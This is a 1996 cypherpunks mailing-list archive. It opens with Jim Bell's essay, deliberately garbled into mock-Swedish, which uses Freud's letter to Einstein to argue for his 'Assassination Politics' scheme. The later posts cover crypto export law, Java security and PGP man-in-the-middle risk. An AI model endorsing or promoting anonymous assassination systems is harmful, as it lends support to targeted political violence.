meeght ind up beeeng reeght, boot elterneteefely huped thet iff vrung, I vuoold be-a
suun currected.  I ves feerffool thet I ves vrung, boot elsu feerffool thet zeere-a
vuoold be-a nutheeng in thees issey thet vuoold esseest me-a in my unelysees ooff zee
seetooeshun.
Bork Bork Bork!

Ebuoot a thurd ooff zee vey thruoogh Freood's letter, I hed my unsver.  Beloo, I
shoo a segment ooff Freood's reply, perheps sefeeng zee vhule-a letter fur
inclooseeun intu a leter pert ooff thees oongueeng issey.  Vheele-a I cuoold
dresteecelly ooferseempliffy zee seetooeshun und stete-a, "Freood ves vrung!," it
toorns oooot thet thees breeeff cunclooseeun is et best heeghly meesleeding und et
vurst flurteeng veet deeshunesty.  By fer zee greeter pert ooff Freood's unelysees
mekes a greet deel ooff sense-a tu me-a, und I vuoold sey he's prubebly currect.
Bork Bork Bork!
Boot it is et oone-a pueent thet I beleeefe-a he-a gues joost a beet vrung, elthuoogh fur
reesuns vheech ere-a inturely understundeble-a und ifee predeecteble-a, geefee zee
ege-a in vheech he-a leefed.  It moost be-a remembered, fur ixemple-a, thet Freood ves
burn intu un ira vhere-a zee telephune-a ves a noo infenshun, bruedcest redeeu
ves nun-ixeestent, und noospepers vere-a zee preemery meuns thet noos ves
cummooneeceted tu zee poobleec.  It vuoold be-a heeghly unreesuneble-a fur us tu hefe-a
ixpected Freood tu hefe-a unteecipeted defelupments sooch es zee Internet,
ununymuoos deegitel cesh, und guud poobleec-key incrypshun.
Bork Bork Bork!

In sume-a sense-a, et thet pueent, my beeggest regret ves thet I cuooldn't deescooss
zee issooe-a veet ieezeer ooff zeese-a tvu cummooneecunts, Freood hefeeng deeed in 1939,
und Ieenstein in 1955, effter hefeeng helped ineetiete-a reseerch thet led tu zee
defelupment ooff zee etumeec bumb, zee veepun thet fur decedes und ifee noo,
mekes it ebsulootely, feetelly impurtunt tu ileeminete-a zee pusseebility ooff ver
frum zee vurld.
Bork Bork Bork!

 Boot I'll let Dr. Freood speek, es he-a spuke-a oofer seexty yeers egu, becoose-a he-a
hes mooch tu sey:

"Sooch zeen, ves zee ooreeginel stete-a ooff theengs:  dumeeneshun by vhuefer hed zee
greeter meeght--dumeeneshun by broote-a feeulence-a oor by feeulence-a sooppurted by
intellect.  Es ve-a knoo, thees regeeme-a ves eltered in zee cuoorse-a ooff ifulooshun.
Bork Bork Bork!
Zeere-a ves a pet thet led frum feeulence-a tu reeght oor lev.  Vhet ves thet
pet?  It is my beleeeff thet zeere-a ves oonly oone-a:  zee pet vheech led by vey
ooff zee fect thet zee soopereeur strengt ooff a seengle-a indeefidooel cuoold be-a
reefeled by zee uneeun ooff seferel veek oones.  "L'ooneeun feeet la furce-a."
[French; In uneeun zeere-a is strengt.]  Feeulence-a cuoold be-a brukee by uneeun,
und zee pooer ooff thuse-a vhu vere-a uneeted noo represented lev in cuntrest tu
zee feeulence-a ooff zee seengle-a indeefidooel.  Thoos ve-a see-a thet reeght is zee meeght
ooff a cummooneety.  It is steell feeulence-a, reedy tu be-a durected egeeenst uny
indeefidooel vhu reseests it; it vurks by zee seme-a methuds und fulloos zee seme-a
poorpuses.  Zee oonly reel deefffference-a leees in zee fect thet vhet prefeeels is
nu lunger zee feeulence-a ooff un indeefidooel boot thet ooff a cummooneety."

[Boot beloo is vhere-a I theenk Freood fells intu a certeeen degree-a ooff irrur,
perheps nut by zee stunderds und reeleeties ooff _hees_ dey, boot thuse-a ooff oooors.
Bork Bork Bork!
My cumments ere-a in sqooere-a breckets, [], und Freood's cumments ere-a qoouted "".
Bork Bork Bork!
 Freood cunteenooes: ]

"Boot in oorder thet zee trunseeshun frum feeulence-a tu thees noo reeght oor joosteece-a
mey be-a iffffected, oone-a psychulugeecel cundeeshun moost be-a foolffeelled.  Zee uneeun
ooff zee mejureety moost be-a a steble-a und lesteeng oone-a.   Iff it vere-a oonly bruooght
ebuoot fur zee poorpuse-a ooff cumbeteeng a seengle-a dumeenunt indeefidooel und vere-a
deessulfed effter hees deffeet, nutheeng vuoold be-a eccumpleeshed. Zee next persun
vhu thuoogh heemselff soopereeur in strengt vuoold oonce-a mure-a seek tu set up a
dumeeniun by feeulence-a und zee geme-a vuoold be-a repeeted ed inffeenitoom.  Zee
cummooneety moost be-a meeenteined permunently, moost be-a oorguneezed, moost drev up
regooleshuns tu unteecipete-a zee reesk ooff rebelleeun und moost insteetoote-a
oothureeties tu see-a thet thuse-a regooleshuns--zee levs-- ere-a respected und tu
soopereentend zee ixecooshun ooff legel ects ooff feeulence-a.  Zee recugneeshun ooff a
cummooneety ooff interests sooch es zeese-a leeds tu zee groot ooff imushunel teees
betveee zee members ooff a uneeted gruoop ooff peuple-a--cummoonel feeleengs vheech ere-a
zee trooe-a suoorce-a ooff its strengt."     [ind ooff Freood's qooute-a]


[Thuse-a ooff yuoo vhu trooly cumprehend zee idea ooff "Essesseeneshun Puleetics"
veell, I'm cunffeedent, understund ixectly vhy I cunseedered thees segment ooff
Freood's letter tu be-a impurtunt inuoogh tu incloode-a, und veell prubebly elsu
recugneeze-a vhy I cunseeder Freood's unelysees tu gu vrung, elbeeet fur
cumpereteefely meenur und understundeble-a reesuns.  I veell eddress zee lest
peregreph in greeter deteeel, tu ixpleeen vhet I meun.  I veell repeet Freood's
vurds, und eddress iech ooff hees pueents frum zee stundpueent ooff tudey's
seetooeshun und technulugy.]

"Boot in oorder thet zee trunseeshun frum feeulence-a tu thees noo reeght oor joosteece-a
mey be-a iffffected, oone-a psychulugeecel cundeeshun moost be-a foolffeelled.  Zee uneeun
ooff zee mejureety moost be-a a steble-a und lesteeng oone-a."

[In a sense-a, Freood is ebsulootely currect:  Vhetefer system is chusee tu
"gufern" a suceeety, it moost cunteenooe-a tu ooperete-a "furefer." ]  Freood cunteenooes:

" Iff it vere-a oonly bruooght ebuoot fur zee poorpuse-a ooff cumbeteeng a seengle-a
dumeenunt indeefidooel und vere-a deessulfed effter hees deffeet, nutheeng vuoold be-a
eccumpleeshed."

[Thees is vhere-a zee prublem begeens tu creep in.  Freood is leedeeng up tu
joosteeffying zee ixeestence-a ooff a furmel gufernment es he-a knoo zeem in zee
1930's, besed oon zee cunteenooing need fur keepeeng zee peece-a.  Zee furst, und
I theenk, zee must oobfeeuoos prublem is thet Freood seems tu impleecitly essoome-a
thet zee poorpuse-a ooff zee uneeun veell ectooelly be-a foolffeelled by zee furmeshun ooff
a gufernment.  Freood, vhu deeed in 1939, deedn't see-a vhet hees soorfeefurs sev, a
"legeetimete-a" gufernment in Germuny hefeeng keelled meelliuns ooff peuple-a in zee
Hulucoost, oor muny oozeer inceedents soobseqooent tu thet.  Und Freood, vhuse-a
letter ves vreettee in 1932, ves prubebly nut evere-a ooff zee slooghter ooff zee
Roosseeun Kooleks in zee lete-a 1920's und ierly 1930's, oor zee poorges vheech
fullooed.  Freood cuoold hefe-a felt, generelly, thet zee prublems veet a
cuoontry's gufernunce-a vere-a coosed ieezeer by inedeqooete-a gufernment oor seemply a
rere-a ixemple-a ooff gufernment gune-a bed.  Ve-a knoo, tu zee cuntrery, thet
gufernments fery freqooently "gu bed," in zee sense-a ooff feeuleting ceetizen's
reeghts und ebooseeng zee pooer introosted tu zeem.  Foo mey ind up keelling
meelliuns, boot tu essoome-a thet ve-a moost cunteenooe-a tu tulerete-a gufernments joost
becoose-a zeey dun't gu qooeete-a es fer es Nezee Germuny vuoold be-a fuuleesh in zee
ixtreme-a.]

[Zee secund prublem is zee impleecit essoompshun thet zee lung-term cuntrul he-a
(currectly) sees MOOST cume-a frum un oorguneezeshun leeke-a a tredeeshunel
gufernment.  Trooe-a, in zee ira in vheech Freood leefed, thet cunclooseeun mede-a a
greet deel ooff sense-a, becoose-a a vell-fooncshuneeng gufernment eppeered soopereeur
tu nune-a et ell.  Und it ves et leest plooseeble-a thet sooch cuntrul COOOLD cume-a
frum a gufernment.  Boot es zee oold seyeeng gues, "Pooer curroopts, und
ebsuloote-a pooer curroopts ebsulootely."]

[Tu use-a a huoose's zeermustet es un unelugy, boot deefffferently thun I deed in
"Essesseeneshun Puleetics pert 6," a persun vhu leefed in un ira beffure-a
ootumeteec foornece-a zeermustets vuoold elveys cuncloode-a thet a persun's iffffurts
vuoold hefe-a tu be-a cunteenooelly durected tooerds meeenteining un ifee
temperetoore-a in hees huoose-a, by eddeeng fooel oor leemiting it, by eddeeng mure-a eur
oor restreecting, itc.  Tu zee ixtent thet thees munooel cuntrul cunsteetootes a
"gufernment," he-a veell beleeefe-a thet thees hunds-oon cuntrul veell elveys be-a
necessery.  Boot ve-a noo leefe-a in a teeme-a vhere-a a persun's teeme-a is rerely
durected tooerds thees iffffurt, zee fooncshun hefeeng beee tekee oofer by
ootumeteec zeermustets vheech ere-a cheep, releeeble-a, und eccoorete-a.  Zeey ere-a
elsu, inceedentelly, issenteeelly "uncurroopteeble-a," in zee sense-a thet zeey
dun't feeel ixcept fur "understundeble-a" reesuns, und repeur is cheep und
iesy.  (Und a zeermustet cun nefer be-a breebed, oor get tured, oor hefe-a its oovn
interests et heert und begeen tu soobfert yuoor oovn cummunds.)   Qooeete-a seemply,
zee prugress ooff technulugy hes poot cuntrul ooff temperetoore-a in zee hunds ooff un
ootumeteec, irrur-free-a system thet is su releeeble-a es tu be-a ignureble-a must ooff
zee teeme-a.]

[I ergooe-a thet leekooise-a, zee prugress ooff technulugy vuoold elloo un ootumeteec
system tu be-a set up, vheech I celled "Essesseeneshun Puleetics" (boot cuoold
prubebly use-a a mure-a ept neme-a, seence-a its eppleeceshun ixtends fer beyund zee
issooe-a ooff puleetics) deefffferent frum tredeeshunel gufernment, a deefffference-a
sumoohet uneluguoos tu zee deefffference-a betveee a persun's fooll-teeme-a iffffurts
und un ootumeteec zeermustet.  Eseede-a frum zee dremeteec redoocshun in iffffurt
infulfed, un ootumeteec system vuoold ileeminete-a zee irrurs coosed by
inettenshun by zee ooperetur, sooch es leefeeng, felleeng esleep, oor oozeer
tempurery leck ooff cuncentreshun.  Zeese-a feeeloores ere-a sumoohet uneluguoos tu
zee feeeloore-a oor meesbehefiur ooff a curroopteeble-a oor indeefffferent oor ifee a
meleeciuoos gufernment.]

[Thees mekes a gufernment leeke-a Freood sev tutelly unnecessery.  Ooff cuoorse-a,
Freood cuoold nut hefe-a unteecipeted zee technulugeecel defelupments thet vuoold
meke-a un "ootumeteec" replecement fur gufernment ifee pusseeble-a, und thoos he-a
fullooed hees cuntempurery peredeegms und suooght tu joosteeffy zee gufernments es
zeey zeen ixeested.]  Freood cunteenooes:

"Zee next persun vhu thuooght heemselff soopereeur in strengt vuoold oonce-a mure-a
seek tu set up a dumeeniun by feeulence-a und zee geme-a vuoold be-a repeeted ed
inffeenitoom."

[Thees stetement is currect, boot I theenk it meesses zee pueent:  Muny fooncshuns
ooff indeefidooels und mecheenes ere-a nefer "cumpleted", und moost "be-a repeeted ed
inffeenitoom."  (Zee must beseec ixemple-a:  Iff ve-a ere-a oopteemistic ebuoot zee footoore-a
ooff zee hoomun rece-a, by deffeenishun reprudoocshun und soorfeefel moost be-a "repeeted
ed inffeenitoom.")   Thet dues nut meun thet zee mechuneesm vheech hundles thet
need moost be-a uny mure-a cumpleeceted thet zee meenimoom necessery tu echeeefe-a zee
cuntrul needed.  I egree-a thet a system ooff lung-term cuntrul is necessery;
vhere-a I deesegree-a veet Freood is seemply thet I beleeefe-a thet a festly better
methud ooff cuntrul noo cun putenteeelly ixeest thun zee tredeeshunel gufernments
thet he-a
knoo.  Tu zee ixtent thet he-a cuooldn't hefe-a unteecipeted zee Internet,
ununymuoos deegitel cesh, und guud incrypshun, he-a hed nu reesun tu beleeefe-a
thet gufernment cuoold be-a "ootumeted" und tekee oooot ooff zee hunds ooff a teeny
frecshun ooff zee pupooleshun, a frecshun vheech is curroopteeble-a, meleeciuoos, und
selff-interested.  Elsu, by nut beeeng evere-a ooff mudern technulugy, he-a is
unevere-a hoo iesy it hes becume-a, cunceptooelly, fur peuple-a tu cume-a tugezeer
fur zeeur selff-deffense-a, iff thet selff-deffense-a reqooured oonly a foo keelubytes
be-a sent oofer feeber-oopteec cebles tu a centrel regeestry.  Freood's oobjecshun tu
un "indlessly repeeteeng" system breeks doon in thees cese-a, su hees cunclooseeun
need nut be-a cunseedered feleed.]


Freood cunteenooes:

"Zee cummooneety moost be-a meeenteined permunently, moost be-a oorguneezed, moost drev
up regooleshuns tu unteecipete-a zee reesk ooff rebelleeun und moost insteetoote-a
oothureeties tu see-a thet thuse-a regooleshuns--zee levs-- ere-a respected und tu
soopereentend zee ixecooshun ooff legel ects ooff feeulence-a."


[Egeeen, I theenk Freood meesses zee pueent.  He-a reffers tu "zee reesk ooff
rebelleeun," boot I theenk he-a furgets thet zee meeen reesun fur "rebelleeun" is
zee eboose-a by zee gufernment zeen in cuntrul. (Netoorelly, it luuks
deefffferently frum zee stundpueent ooff thet gufernment!)   Iff zee letter prublem
cuoold be-a ileemineted, "rebelleeun" vuoold seemply nefer ooccoor, fur zeere-a vuoold
be-a nu reesun fur it.  Iff thuse-a thet vere-a "rebelleeng" vere-a in zee vrung,
feeuleting sumebudy's reeghts, zeen my "Essesseeneshun Puleetics" system vuoold
be-a eble-a tu teke-a cere-a ooff it.  Thees, presoomebly und understundebly, Freood
cuoold nefer hefe-a fureseee. Elsu, Freood dues nut eddress zee qooesshun ooff
vhezeer oor nut zee gufernment vheech prumoolgetes thuse-a levs is dueeng su in a vey
preemerily fur zee beneffeet ooff zee poobleec, oor thuse-a vhu pupoolete-a zee
gufernment itselff. Grefft ves vell knoon iff Freood's teeme-a; it seems tu me-a thet
he-a shuoold hefe-a eddressed zee qooesshun ooff vhezeer oor nut un inteety celled a
"gufernment" cuoold ectooelly echeeefe-a zee beneffeets he-a cleeems joosteeffy zee
gufernment, veethuoot beeeng soobferted by thuse-a vhu cuntrul it, fur zeeur oovn
interests.  Iff nut, zeen zeere-a is certeeenly a issooe-a tu be-a eddressed:  Et
vhet pueent du zee depredeshuns ooff a pereseetic gufernment ixceed its
beneffeets?  Und cun ve-a feend a vey tu du veethuoot it?]  Freood cunteenooes:


"Zee recugneeshun ooff a cummooneety ooff interests sooch es zeese-a leeds tu zee
groot ooff imushunel teees betveee zee members ooff a uneeted gruoop ooff
peuple-a--cummoonel feeleengs vheech ere-a zee trooe-a suoorce-a ooff its strengt."
[thees is ind ooff zee purshun ooff Freood's letter vheech I qooute-a here-a.]

Oone-a ooff zee interesteeng theengs ebuoot thees stetement is thet it is zee
defelupment ooff tuuls sooch es zee Internet vheech veell be-a ileemineting zee fery
cuncept ooff "fureeegn" und "fureeegner."  Zeey veell becume-a erteefficiel
deestincshuns.  Zeere-a is cleerly mooch precedent fur thees, frum zee cuoontry in
vheech I leefe-a, Emereeca.  Vhee furmed, it cunteeened peuple-a vhuse-a preemery
luyelty ves tu zeeur _stete-a,_ nut tu zee Federel gufernment es a vhule-a. Ifee
oooor ceefil ver, frum 1861 tu 1865, ves besed oon luyelty tu stetes oor regeeuns,
rezeer thun zee cuoontry es a vhule-a.   Tu ceete-a joost oone-a ixemple-a, myselff,
vheele-a I reseede-a in zee stete-a celled Vesheengtun, I'fe-a leefed in a noomber ooff
oozeer stetes, boot I dun't cunseeder myselff luyel tu uny perteecooler stete-a.
Bork Bork Bork!
(Perheps useeng myselff es un ixemple-a is meesleeding, becoose-a et thees pueent I
dun't cunseeder myselff "luyel" tu uny gufernment et ell!)

In fect, leter in Freood's letter, he-a seys, "Unytheeng thet incuooreges zee
groot ooff imushunel teees betveee mee moost ooperete-a egeeenst ver."  Sedly,
Freood deed nut leefe-a tu see-a zee defelupment ooff zee Internet, und zee messeefe-a
interneshunel cummooneeceshun vheech it hes elreedy begoon tu fuster.  In _hees_
dey, zee oordeenery peuple-a ooff oone-a cuoontry und unuzeer rerely cummooneeceted,
ixcept perheps fur letters veet releteefes frum "zee oold cuoontry" thet
imeegreted.  Zee idea ooff gueeng tu ver veet peuple-a frum vhum yuoo get imeeel oon
a deeely besees is, in itselff, a "fureeegn cuncept" tu me-a, und I hupe-a it veell
remeeen su!  In thet sense-a, Freood ves fery reeght:  "Essesseeneshun Puleetics"
ecteefe-a oor nut, it veell be-a mooch herder fur gufernments tu vheep up zeeur
ceetizens intu a frenzy tu keell zee inemy iff zeey cun type-a tu zeem ifery dey.
Bork Bork Bork!

Froostreteengly lefft ununsvered is a qooesshun vhuse-a unsver I'd leeke-a tu knoo:
Cuoold I hefe-a cunfeenced Freood, oor Ieenstein, thet "Essesseeneshun Puleetics" is
nut oonly a necessery oor ifee un unefueedeble-a system, boot elsu a GOOD oone-a?
Cuoold I cunfeence-a zeem tudey, hed zeey murecooluoosly soorfeefed unteel tudey,
evere-a ooff zee lest 64 yeers ooff heestury soobseqooent tu zeeur currespundence-a?

Jeem Bell
jeembell@peceeffier.cum





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 30 Apr 1996 08:50:05 +0800
To: cypherpunks@toad.com
Subject: Social Transformation, Not Tax Evision
Message-ID: <2.2.32.19960429142827.00727a88@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

That's not a threat.  It's a promise.

Cypherpunks have many different political and ethical views.  Like other
denizens of the Net, some tend towards libertarianism.  In fact, some of us
argued five years ago or more that the culture of the net was inherently
libertarian because making realistic threats of force was difficult over a
communications medium.  People just hang up on you.  Since the best way to
get on in electronic interactions is to offer something somebody wants and
use third party guarantor systems to assure the payment in cases where
payment is required, people would get used to non-coercive mechanisms of
exchange and this would shape their general attitudes.

Note that 95% of the world's population were once peasants bound to the
soil.  They had zero status.  They were born one place and were stuck there
until they died.  This was ordained by God.  When the age of reason and the
machine came along, the productivity and hence the value of peasants
exploded.  They were able to leave the land and work in factories.  Even
though they looked like they were worse off, the earliest factory workers
were vastly wealthier than they had been on the land.  The ancien regime was
destroyed by technology.  

Since then, we have experienced the Century of Death during which national
states murdered more than 100 million people.  In 1995, the Government of
the United States collected under threat of force some $1.4 Trillion in
exactions.  More than any government in the history of Mankind.  Today's
regimes seem as natural to us as did the former arrangements which bound the
peasants in thrall.  They are ordained by God.

Once the peasants had an out, they flocked to the cities and they continue
to do so today in the Third world.  Some of us on cypherpunks merely predict
that when freed of the restraints imposed by the modern nation state,
today's "peasants" will do the same.  For the factory and the city
substitute cyberspace.

Social systems that are "ordained by God" are often discovered to actually
be sustained by secular power and when the balance of power shifts...

DCF

"God fights on the side with the heaviest artillery.  These days MarketEarth
has the heaviest artillery."

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMYTRMYVO4r4sgSPhAQEufwP/bmZyYmNpBAMDJcAQ+enFvZDeCZwcMtvi
1wCuUsRvLmUcNlgYzDyVB22Pu03hi5TwG2+juFIMJ+QYJwCgApMtqI/lixlnuiuB
SGua/yATB/AJ+Yg+l/cd8uY4GLKTWENlvlfFq1gMcqlRSGf+niAfalmvmoeTeBxv
fBwG4T2MGoo=
=NWDL
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 30 Apr 1996 08:44:23 +0800
To: cypherpunks@toad.com
Subject: WSJ on Crypto Push
Message-ID: <199604291431.KAA03328@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   WSJ, April 29, 1996

   Software-Scrambling Proponents Pushing To Ease Export Curbs

   New York -- Champions of encryption software -- computer
   programs that scramble data to thwart eavesdroppers -- this
   week will step up efforts to loosen export restrictions on
   the technology.

   Sen. Conrad Burns (R., Mont.) is expected to introduce
   tomorrow a bill that would ease the federal government's
   export rules. At the same time, industry-trade groups and
   privacy advocates will seek grass-roots support via the
   Internet.

   Current regulations limit the export of encryption software
   to weak systems that are presumed easy for intelligence and
   law-enforcement organizations to crack. The Clinton
   administration has opposed the sale of stronger systems,
   saying terrorists or other foes could use them to conduct
   operations without being monitored.

   But technology executives contend these regulations hamper
   their ability to compete overseas. And because the
   regulations govern any software that incorporates the
   technology to keep data secure, they can impede exports of
   electronic-mail systems, World Wide Web software and other
   Internet-related packages.

   "Right now, the industry is just wondering whether the
   administration will deal with this before we start losing
   market share," said D. James Bidzos, chief executive
   officer of RSA Data Security Inc., a Redwood City, Calif.,
   concern that supplies encryption software.

   The new bill would give software makers free rein to sell
   scrambling systems overseas as long as the same systems are
   widely available in the U.S. Other encryption technologies
   could be exported as well if similar products are already
   generally available outside the U.S.

   -----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Fahy <robert@infopoint.ie>
Date: Tue, 30 Apr 1996 02:43:38 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <09335874100046@infopoint.ie>
MIME-Version: 1.0
Content-Type: text/plain


unsubcribe robert@infopoint.ie





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Tue, 30 Apr 1996 02:46:18 +0800
To: sameer@c2.org
Subject: Re: connecting Uni to the Web O Trust
In-Reply-To: <199604290521.WAA21769@atropos.c2.org>
Message-ID: <199604290846.KAA01661@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 sameer@c2.org wrote:
(> Black Unicorn <unicorn@schloss.li> wrote:)
> > (Sigh).  I'll say it yet a third time.  Get a current copy of my key which
> > is signed by at least three people on the web of trust.
> 
> 	As if this "web of trust" was actually worth something.


It is most certainly worth something, as long as the
participants exercise the necessary measures to detect and
correct any active attacks on it.  The primary reason that
the Web O Trust is ineffective at this point is the
prevalence of misunderstandings among users (including
cypherpunks) about its usage and its efficacy.


As an example of these prevalent misunderstandings, I submit
to you the fact that PGP keyservers do not use PGP, either
for encryption or authentication.  If you suggest it to them
(or indeed, to most cypherpunks) they will respond that it
would "do no good".  Ridiculous.


It's a shame really, since if we _did_ have the wits to
create a Web O Trust now, it would serve to prevent active
attacks in the future.


Hopefully the public key infrastructure people will come up
with something that will replace the WoT and will be more
understandable or acceptable to people.


In the meantime, I cannot have much confidence in the
security of my private communications with Black Unicorn,
which makes me hesitant to exchange money with him.


Unfortunate that cypherpunks are so ineffectual when it
comes to "social engineering" (not in the "social cracking"
sense).


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMYSB8kjbHy8sKZitAQEuhwL/YDwOJB9pFP2Fbj0DBMvN8byLm4O3XwTK
klt5SOkS4ahKoE04bzTAMb2HhyX4xGyGxJD/dbB0FxJSHRSpI5Th/6Jk6UNNQrMe
6GppN1HO2yHA5muxNxwWiERk0XGNtaFN
=jMKu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 30 Apr 1996 12:57:06 +0800
To: cypherpunks@toad.com
Subject: Re: code vs cypher
In-Reply-To: <3184D638.188C00D4@cs.berkeley.edu>
Message-ID: <Pine.GUL.3.93.960429104732.17234C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 29 Apr 1996, Raph Levien wrote:

> jamesd@echeque.com (Robespierre) wrote:
> >
> > At 10:01 PM 4/28/96 -0700, Rich Graves wrote:
> > > I do not recall defending any statist policies. I did not defend the
> > > [SMC call to silence Nazis], and indeed to defend the
> > > [SMC ] would not have been
> > > egregious statism, or indeed any kind of statism at all,
> >
> > I do not recall anyone accusing you of statism on the SMC call to cut
> > Nazi net access -- probably because I deleted all that tedious crap,
> > not because nobody accused you.
> 
> [blah blah blah deleted]
> 
>    I just wanted to point out that, for those who had any remaining
> doubt, the evolution of this thread demonstrates quite well the need for
> a separate coderpunks list.

I quite agree, as I said in the part of the message that James snipped. 
I'm learning a lot lurking on coderpunks. I'm also learning a lot on
alt.revisionism and talk.politics.libertarian. I'm glad we have all of
those. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 30 Apr 1996 12:09:47 +0800
To: Marianne Mueller <mrm@netcom.com>
Subject: Re: The Joy of Java
In-Reply-To: <199604272232.PAA00806@netcom20.netcom.com>
Message-ID: <Pine.SOL.3.91.960429103500.346C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Apr 1996, Marianne Mueller wrote:

> But let's not have a food fight.  Although entertaining in the short term,

I don't owe you anything! I don't owe you anything! Oh, food fight.

> reasonably secure way, on the internet, using Java.  We're working on a
> response to the Felten el al. paper, which will be posted to the net
> shortly.  I think some of their points are perfectly valid, some of their
> points are irrelevant, and a lot of the presentation is melodramatic. 

Most of the emphasis in the paper seems to be on the lack of a 
denotational semantics for java and the java VM, and on the lack of a 
formally defined set of rules for type inferencing rules. 

For security purposes, java-the-language is not particularly important; 
it's the VM code that counts. This is a shame, as it's pretty easy to 
come up with a reasonably clean denotation for java, wheras the byte code 
gets pretty messy. It would probably be easier to get a cleaner semantics 
if you define a set of rules to transform the byte code into an alternate 
form and then define the denotational semantics for that. The paper 
mentions  that the authors believe the VM to be unsuitable for a 
denotational semantics, but the issue is not explored to any great depth. 

> Melodrama is good for sound bites, I guess. 

I take it twenty minutes before I go to sleep; seems to work pretty well.


---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Tue, 30 Apr 1996 10:46:23 +0800
To: die@die.com
Subject: Re: NOISE - AARMs
In-Reply-To: <9604282326.AA01174@pig.die.com>
Message-ID: <199604291501.LAA01169@nrk.com>
MIME-Version: 1.0
Content-Type: text


> 	Why the Russians did not use this technology earlier 
> remains puzzling ... and why Dudeyev used a satellite phone
> which made him a sitting duck is even less clear.
> 
> 						Dave Emery
> 						die@die.com
>   

But there has been an easy defense against such for decades. 

You run ordinary phone wire from the transmitter + antenna X meters
back to the bunker or whatever. Then you talk from there.

X varies as afunction of the expected incoming.

I bought some surplus 1950's era field telephones with this
option built it -- they had a 150v B-battery [NOW i'm dating myself]
that was dropped across the pair when you squeezed the handset
Push-to-Talk. At the far end, a relay closed & turned on the
transmitter.


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Tue, 30 Apr 1996 02:42:37 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: My nym: Statement
In-Reply-To: <Pine.SUN.3.93.960428215100.25014G-100000@polaris.mindport.net>
Message-ID: <199604290904.LAA03436@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity calling itself Black Unicorn <unicorn@schloss.li> probably
 wrote:
> +++++ BEGIN PGP SIGNED MESSAGE (VERIFIED) (bap v1.1b2) +++++
> 
> I thought I would take a moment to discuss my nym, given the Web of Trust
> issues floating about right now.

<snip>


> The man in the middle problem with my nym is not really an issue as far as
> I can tell.  I suppose someone might argue that they wouldn't want to mail
> me anything asking for legal advice for fear it might be intercepted and
> returned to them with disinformation attached.  As these are people I
> generally don't know, it's equally likely to them that I am simply an
> agent provocateur who has no man in the middle problems.


I find that less likely, personally.  In any case it should
be understood that they are separate threats, which should
be considered separately.  Solving one will not solve the
other, but by leaving _both_ unsolved you increase your 
risk.


> From my end, man in the middle attacks are difficult to use against me
> because those with whom I have extensive business and personal
> communications know me well enough to permit end to end verification
> through seperate secure channels.  (I use secure telephones regularly, and
> this permits voice recognition).


I apologize for mistakenly thinking that you had no
signatures.  Furthermore, I take back what I said about you
not being sufficiently conscious of man in the middle
attacks.


So now we have connections to the Web O Trust, and some
degree of confidence that you are alert to the possibility
of MITM attacks.  All I need to do is assure myself that
each person between you and I on the Web O Trust is
similarly engaging in counter-MITM measures...


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMYSGMkjbHy8sKZitAQHHRgMAuq9/J3OacbGAUICrb2SaMfKrqY6AGnmP
2yOLDoNcokSfz+EUtcLEAHWUcXAXSqsK6CWFeMSniLb/uTYKNXzovh6lZ92AvkJu
ynazcyAOtZYjDvlTkaFzdN2o1Ca3W2DI
=A5Gy
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Tue, 30 Apr 1996 02:43:09 +0800
To: kruempel@cs.colorado.edu
Subject: Bold Assertion: there are no Men in the Middle
Message-ID: <199604290915.LAA04182@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I have the intuition that there has never been a successful
MITM attack which has subverted the use of PGP 
authentication.  If we could be sure of this hypothesis, 
then we could go about creating a strongly linked Web O 
Trust and then use it from now until such a future time as
1024-bit PGP keys are brute forceable.  We could also use 
it to bootstrap bigger keys, a wider and more strongly-
connected Web O Trust, etc.


I can't think of any good way to test this hypothesis,
however.  One thing that we _could_ test is the difficulty
of performing such an attack.


If I had the cash, I would post a reward for anyone who
could successfully run a demo MITM attack on two
unsuspecting stooges.  I would (of course) specify with more
precision what would constitute a successful attack, how it
would be proven to me that the attack was successful and so
forth.


But I don't have sufficient cash to motivate such a trick,
and there would be some very complicated ethical and
